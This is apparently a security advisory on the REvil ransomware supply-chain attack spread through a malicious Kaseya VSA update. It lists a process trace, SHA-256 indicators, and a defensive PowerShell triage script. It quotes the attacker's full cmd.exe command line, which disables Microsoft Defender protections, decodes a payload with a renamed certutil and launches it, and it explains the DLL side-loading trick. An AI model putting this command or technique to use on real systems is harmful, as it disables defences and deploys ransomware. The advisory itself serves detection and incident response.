Active Threat – Happening Now
We are monitoring a supply chain attack outbreak using REvil ransomware. At this time it appears to stem from a malicious Kaseya VSA update. A malicious DLL containing the REvil ransomware (C:\Windows\mpsvc.dll) is side-loaded into a legitimate older copy of the Microsoft Defender engine (C:\Windows\MsMpEng.exe), so the encryption runs from a legitimate-looking, Microsoft-signed process.
Before the payload runs, the attack chain calls PowerShell's Set-MpPreference to disable Microsoft Defender Real-Time Monitoring, script scanning, Controlled Folder Access and other protections.
Process Trace (listed child first, parent last):
1. C:\windows\msmpeng.exe
2. C:\kworking\agent.exe
3. C:\Windows\SysWOW64\cmd.exe
4. C:\windows\system32\cmd.exe (full command line listed below)
5. AgentMon.exe
6. C:\Windows\System32\services.exe
"c:\windows\system32\cmd.exe"
/c ping 127.0.0.1 -n 4307 > nul & c:\windows\system32\windowspowershell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y c:\windows\system32\certutil.exe c:\windows\cert.exe & echo %RANDOM% >> c:\windows\cert.exe & c:\windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt c:\windows\cert.exe & c:\kworking\agent.exe
The command above does the following, in order (each step is chained with &, so every step runs whether or not the previous one succeeded):
• Sleeps for roughly 4307 seconds (about 72 minutes) with ping 127.0.0.1 -n 4307, one echo request per second
• Disables Real-Time Monitoring
• Disables IPS
• Disables IOAV protection (scanning of downloaded files and attachments)
• Disables script scanning
• Disables Controlled Folder Access (ransomware prevention feature)
• Sets Network Protection to audit mode, so it logs but no longer blocks
• Disables cloud lookup (MAPS reporting)
• Stops cloud sample submission
• Copies certutil.exe to c:\windows\cert.exe and appends a random value to it, so the copy's hash no longer matches the known-good certutil
• Runs cert.exe -decode to turn c:\kworking\agent.crt into c:\kworking\agent.exe
• Deletes agent.crt and cert.exe
• Launches c:\kworking\agent.exe
agent.crt is dropped into c:\kworking by the Kaseya VSA agent. The command above decodes it with the renamed certutil (cert.exe) to produce agent.exe. agent.exe is a dropper with two files embedded, MsMpEng.exe and mpsvc.dll; it writes both to C:\Windows and starts MsMpEng.exe. That legitimate, signed, older Windows Defender binary loads mpsvc.dll by name from its own directory, so the REvil ransomware in the malicious mpsvc.dll is side-loaded and runs inside a trusted-looking process.
Hashes (SHA-256)
agent.exe (dropper): d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
mpsvc.dll: 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
cert.exe: 605045dc7b338492bdc2de5a1c3e01d64d3cc43aed429edbe88ee6f2feba284c
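The following host-triage script is an added example and is not code from Kaseya, Huntress or the attackers. It checks the three things this page describes: the Set-MpPreference tamper state, the dropped files (using the paths and SHA-256 values listed above), and an MsMpEng.exe running from outside the Defender install tree. The Get-MpPreference enumeration values it compares against are Microsoft's documented ones; the assumption that a genuine engine path contains "\Windows Defender\" is marked in the code. Run it from an elevated PowerShell on a host that runs the Kaseya VSA agent.

```powershell
# Added host-triage example for the Kaseya/REvil chain described on this page.
# Not code from Kaseya, Huntress or the attackers; paths and hashes come from the
# page above, the Get-MpPreference values are Microsoft's documented enumerations,
# and the Defender install-path pattern in step 3 is an assumption.

function Invoke-KaseyaRevilTriage {
    $findings = New-Object System.Collections.Generic.List[string]

    # SHA-256 values listed on this page, keyed by the path the chain writes to.
    $iocHashes = @{
        'c:\kworking\agent.exe' = 'd55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e'
        'c:\windows\mpsvc.dll'  = '8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd'
        'c:\windows\cert.exe'   = '605045dc7b338492bdc2de5a1c3e01d64d3cc43aed429edbe88ee6f2feba284c'
    }
    # Paths that have no business existing on a clean host, whatever their hash.
    # agent.crt and cert.exe are deleted by the chain, so finding them means the
    # chain was interrupted mid-run; MsMpEng.exe in C:\Windows is the side-load host.
    $iocPaths = @('c:\kworking\agent.crt', 'c:\kworking\agent.exe', 'c:\windows\cert.exe',
                  'c:\windows\mpsvc.dll', 'c:\windows\MsMpEng.exe')

    # 1. Defender tamper state: one check per setting the attack command changes.
    $mp = Get-MpPreference
    if ($mp.DisableRealtimeMonitoring)        { $findings.Add('Real-time monitoring disabled') }
    if ($mp.DisableIntrusionPreventionSystem) { $findings.Add('IPS disabled') }
    if ($mp.DisableIOAVProtection)            { $findings.Add('IOAV (download/attachment) scanning disabled') }
    if ($mp.DisableScriptScanning)            { $findings.Add('Script scanning disabled') }
    if ($mp.MAPSReporting -eq 0)              { $findings.Add('Cloud lookup (MAPS) disabled') }
    if ($mp.SubmitSamplesConsent -eq 2)       { $findings.Add('Sample submission set to NeverSend') }
    # 0 = Disabled and 2 = AuditMode. Both are also the default on many unmanaged
    # builds, so treat these two as supporting evidence rather than proof on their own.
    if ($mp.EnableControlledFolderAccess -eq 0) { $findings.Add('Controlled Folder Access disabled') }
    if ($mp.EnableNetworkProtection -eq 2)      { $findings.Add('Network Protection in audit mode') }

    # 2. Dropped files, with a hash comparison against the values on this page.
    #    Hashtable keys are case-insensitive in PowerShell, so path casing does not matter.
    foreach ($p in $iocPaths) {
        if (-not (Test-Path -LiteralPath $p)) { continue }
        $h = (Get-FileHash -LiteralPath $p -Algorithm SHA256).Hash.ToLower()
        if ($iocHashes[$p] -and $h -eq $iocHashes[$p]) {
            $findings.Add("$p present and SHA256 matches the published IOC")
        } else {
            $findings.Add("$p present (SHA256 $h); not expected on a clean host")
        }
    }

    # 3. MsMpEng.exe running from outside the Defender install tree. Assumption: a
    #    genuine engine path contains '\Windows Defender\' (Program Files or the
    #    ProgramData Platform directory); the side-load copy sits in C:\Windows.
    #    Path may be $null for the genuine protected (PPL) engine, which the guard tolerates.
    Get-Process -Name MsMpEng -ErrorAction SilentlyContinue | ForEach-Object {
        if ($_.Path -and $_.Path -notmatch '\\Windows Defender\\') {
            $findings.Add("MsMpEng.exe running from $($_.Path) (PID $($_.Id))")
        }
    }

    # 4. The 'ping 127.0.0.1 -n <large>' delay shows up as a long-lived ping.exe under
    #    cmd.exe, which gives a window to isolate the host before agent.exe ever runs.
    Get-CimInstance Win32_Process -Filter "Name = 'ping.exe'" | ForEach-Object {
        if ($_.CommandLine -match '127\.0\.0\.1\s+-n\s+\d{3,}') {
            $findings.Add("Delay ping in progress, PID $($_.ProcessId) parent $($_.ParentProcessId): $($_.CommandLine)")
        }
    }

    return ,$findings.ToArray()
}

$result = Invoke-KaseyaRevilTriage
if ($result.Count -eq 0) { 'No indicators from this advisory found on this host.' }
else { $result | ForEach-Object { "[!] $_" } }
```

The function returns the findings as an array rather than only printing them, so the same check can be pushed to many endpoints through the RMM of your choice and the results collected centrally. A host where the delay ping is still running has not yet decoded or launched agent.exe; isolating it at that point stops the chain before encryption.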
We will update as more information becomes available.
To Read More About This Attack: https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/